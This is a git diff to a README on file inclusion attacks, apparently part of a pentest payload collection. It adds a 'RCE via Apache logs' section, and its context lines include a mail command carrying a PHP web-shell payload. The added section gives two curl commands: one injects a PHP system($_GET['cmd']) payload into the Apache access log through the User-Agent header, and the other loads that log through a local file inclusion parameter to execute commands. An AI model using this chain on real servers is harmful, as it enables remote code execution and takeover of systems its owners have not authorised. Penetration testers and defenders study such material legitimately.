diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 8bb0a16..cc4a67f 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line. mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null ``` +### RCE via Apache logs + +Poison the User-Agent in access logs: + +``` +$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>" +``` + +Note: The logs will escape double quotes so use single quotes for strings in the PHP payload. + +Then request the logs via the LFI and execute your command. + +``` +$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id +``` + ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID)